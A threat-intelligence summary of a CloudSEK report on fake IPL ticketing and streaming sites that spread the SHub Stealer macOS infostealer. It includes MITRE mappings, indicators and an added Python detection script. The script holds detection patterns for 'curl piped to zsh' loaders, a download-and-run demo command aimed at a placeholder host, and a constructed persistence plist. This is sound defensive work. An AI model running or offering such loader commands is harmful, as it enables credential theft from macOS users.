CloudSEK uncovered a large IPL fraud ecosystem involving more than 600 fake ticketing domains and over 400 fake free-streaming sites used to scam fans and deliver malware. The campaigns impersonate trusted platforms, harvest personal and payment data, and deploy the SHub Stealer through malicious streaming redirects that target macOS users. #SHubStealer #BookMyShow #District #IPL #WebCric #Crictime
Keypoints
- CloudSEK identified over 600 fraudulent domains impersonating IPL ticketing platforms to deceive fans.
- More than 400 fake "free streaming" sites were found, many acting as malware delivery channels rather than legitimate stream providers.
- The fake ticketing sites mimic trusted brands such as BookMyShow and District, using urgency tactics like countdown timers and limited-seat banners.
- An exposed admin panel revealed real-time booking management, manual payment verification, dynamic price controls, and automated fake ticket generation.
- Victim data such as names, phone numbers, and email addresses is collected and may be reused or sold for secondary scams.
- Streaming-related redirects can lead macOS users into ClickFix-style lures that deploy the SHub Stealer infostealer.
- The SHub Stealer targets passwords, browser data, crypto wallets, Telegram sessions, keychains, and other sensitive files while maintaining persistence.
MITRE Techniques
- [T1566.002] Spearphishing Link - Victims are lured through deceptive links in social media posts, ads, and messages that lead to fake ticketing or streaming pages ["users are pushed through Instagram and Facebook", "posted as helpful 'free stream' links"]
- [T1204.001] User Execution: Malicious Link - The attack relies on users clicking buttons, links, or installer pages that start the malicious redirect chain ["the moment you click anything", "paste the command to complete the installation"]
- [T1059.004] Command and Scripting Interpreter: Unix Shell - A malicious command is pasted into Terminal and piped to zsh to execute the loader ["paste the command", "retrieved from the C2 and piped directly to zsh for execution"]
- [T1027] Obfuscated Files or Information - The payload is Base64-encoded and Gzip-compressed to hide its purpose before execution ["Base64-encoded, Gzip-compressed second-stage loader"]
- [T1057] Process Discovery - The malware fingerprints the victim system by checking host and system details before proceeding ["collecting the hostname, macOS version, external IP address"]
- [T1082] System Information Discovery - The loader gathers device and OS information, including keyboard layout and macOS version ["collecting the hostname, macOS version, external IP address, and keyboard layout information"]
- [T1016] System Network Configuration Discovery - The malware checks the external IP address as part of environment profiling ["external IP address"]
- [T1036] Masquerading - The campaign impersonates legitimate brands and system pages, including ticketing sites, GitHub installers, and Apple security updates ["impersonating District", "impersonating a legitimate GitHub application installer or an Apple macOS security update page"]
- [T1110.001] Brute Force: Password Guessing - The stealer repeatedly prompts for the macOS login password through a fake system dialog ["asks the user to enter their password up to 10 times"]
- [T1555.001] Credentials from Password Stores - The malware attempts to extract the Chrome master password and access stored credentials ["tries to extract the Chrome master password"]
- [T1005] Data from Local System - The malware collects browser files, documents, keychains, notes, and other local data ["copies sensitive files such as Login Data, Cookies, Web Data, History", "steals the entire Keychain directory"]
- [T1185] Browser Session Cookie Theft - It specifically targets cookies from browsers and Safari to hijack sessions ["Cookies", "Safari cookies"]
- [T1119] Automated Collection - The file grabber automatically collects documents and images from common user folders ["collects documents … and PNG images from Desktop and Documents folders"]
- [T1560.001] Archive Collected Data: Archive via Utility - Stolen files are compressed into a zip archive before exfiltration ["The script creates a zip archive"]
- [T1041] Exfiltration Over C2 Channel - Collected data is uploaded to the command-and-control server ["The archive is uploaded to C2"]
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - Persistence is achieved through a LaunchAgent and a fake Google Update service that runs periodically ["installing a LaunchAgent (com.google.keystone.agent.plist)", "runs every 60 seconds"]
- [T1055] Process Injection - The malware executes the AppleScript in memory with redirected streams to remain hidden ["executed directly in memory", "all standard input, output, and error streams redirected to /dev/null"]
- [T1090] Proxy: External Proxy - The infrastructure uses ad brokers, redirects, and routing logic to move victims through multiple intermediary domains ["redirect chain through several shady ad broker domains"]
Indicators of Compromise
- [Domains] fake IPL ticketing and streaming infrastructure - bookmyshow-ipl-ticket[.]com, ipl2026-ticket[.]online, and 18 more suspicious domains
- [Domains] unofficial streaming and redirect destinations - go[.]webcric[.]com, crictime[.]com, and similar platforms mentioned in the analysis
- [File names] malicious macOS payload and persistence artifacts - com.google.keystone.agent.plist, /tmp/.c.sh
- [File paths] temporary storage and collected-data staging - /tmp/shub_/, /tmp/.c.sh
- [File hashes] obfuscated payloads and second-stage loaders - the article references multiple payload files, including a Base64-encoded loader and a large AppleScript payload, but does not provide hashes
- [Email / PDF artifacts] fake ticket delivery objects - fraudulent PDF tickets sent by email after payment
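The host-side artifacts above (the com.google.keystone.agent.plist LaunchAgent running every 60 seconds, the /tmp/.c.sh and /tmp/shub_/ staging paths) and the curl-to-zsh, Base64/Gzip loader chain in the technique list can be checked with a short audit script. The Python below is an added example, not CloudSEK's code: it audits a LaunchAgent plist by what it launches rather than by its file name, lists which staging paths exist, and scores process command lines against the reported loader shape. The two plists it writes, the /Users/alice path, the c2.example.invalid URL, and the assumption that the genuine Keystone agent installed by Google Chrome runs from ~/Library/Google/GoogleSoftwareUpdate are all constructed for the demo; confirm the last one on your own fleet.

```python
import os
import plistlib
import re
import tempfile

# Staging paths named in the report.
STAGING_PATHS = ["/tmp/.c.sh", "/tmp/shub_"]
# Locations a user-writable loader would plausibly execute from.
SUSPICIOUS_DIRS = ("/tmp", "/private/tmp", "/var/folders", "/Users/Shared")
# Assumption (verify on your own fleet): the genuine Keystone agent that Google
# Chrome installs runs from ~/Library/Google/GoogleSoftwareUpdate, so the plist
# file name alone is not an indicator; the program it launches is.
LEGIT_KEYSTONE_DIR = "Library/Google/GoogleSoftwareUpdate"
# Command-line shapes from the reported chain: curl piped into zsh, and a
# Base64 + Gzip second stage decoded inline.
CLICKFIX_PATTERNS = [
    r"\bcurl\b.*\|\s*(zsh|bash|sh)\b",
    r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(gunzip|gzip\s+-d)\b",
]


def audit_launch_agent(plist_path):
    """Return the reasons a LaunchAgent plist looks like SHub persistence ([] if none)."""
    with open(plist_path, "rb") as fh:
        data = plistlib.load(fh)
    args = list(data.get("ProgramArguments") or [])
    if isinstance(data.get("Program"), str):
        args.insert(0, data["Program"])
    joined = " ".join(str(a) for a in args)
    reasons = []
    if str(data.get("Label", "")).startswith("com.google.keystone") and LEGIT_KEYSTONE_DIR not in joined:
        reasons.append("keystone label but program is not under GoogleSoftwareUpdate")
    if any(d in joined for d in SUSPICIOUS_DIRS):
        reasons.append("program runs from a temp or shared directory")
    if re.search(r"\b(zsh|bash|sh|osascript)\b.*\s-(c|e)\b", joined):
        reasons.append("shell or osascript invoked with an inline script")
    interval = data.get("StartInterval")
    if isinstance(interval, int) and interval <= 60:
        reasons.append(f"StartInterval of {interval}s matches the reported 60-second cadence")
    return reasons


def staged_artifacts(root="/"):
    """List which reported staging paths exist; `root` lets the demo use a scratch tree."""
    return [p for p in STAGING_PATHS if os.path.lexists(os.path.join(root, p.lstrip("/")))]


def score_command_line(cmd):
    """Return the loader-chain patterns a process command line matches."""
    return [p for p in CLICKFIX_PATTERNS if re.search(p, cmd)]


def write_constructed_plist(root, benign):
    """Write a constructed LaunchAgent plist (not a real sample) under root and return its path."""
    agents = os.path.join(root, "Library", "LaunchAgents")
    os.makedirs(agents, exist_ok=True)
    if benign:
        # Constructed path shaped like the genuine agent; /Users/alice is a placeholder.
        program = ["/Users/alice/" + LEGIT_KEYSTONE_DIR + "/GoogleSoftwareUpdateAgent"]
        interval = 3600
    else:
        program = ["/bin/zsh", "-c", "/tmp/.c.sh"]
        interval = 60
    path = os.path.join(agents, "com.google.keystone.agent.plist")
    with open(path, "wb") as fh:
        plistlib.dump({"Label": "com.google.keystone.agent", "ProgramArguments": program,
                       "StartInterval": interval, "RunAtLoad": True}, fh)
    return path


def demo():
    """Run every check against a constructed scratch tree and return the findings."""
    root = tempfile.mkdtemp(prefix="shub_demo_")
    os.makedirs(os.path.join(root, "tmp"), exist_ok=True)
    open(os.path.join(root, "tmp", ".c.sh"), "w").close()  # constructed staging artifact
    return {
        "malicious_plist": audit_launch_agent(write_constructed_plist(root, benign=False)),
        "benign_plist": audit_launch_agent(write_constructed_plist(root, benign=True)),
        "staged": staged_artifacts(root),
        # Placeholder URL; the report does not name the C2 host.
        "cmdline_hits": score_command_line(
            "curl -fsSL hxxp://c2.example.invalid/p | base64 -d | gunzip | zsh"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On a real machine, point `audit_launch_agent` at every plist under ~/Library/LaunchAgents and /Library/LaunchAgents and call `staged_artifacts()` with the default root; the benign Keystone plist that Chrome ships should produce no reasons, which is the point of checking the program path instead of the file name.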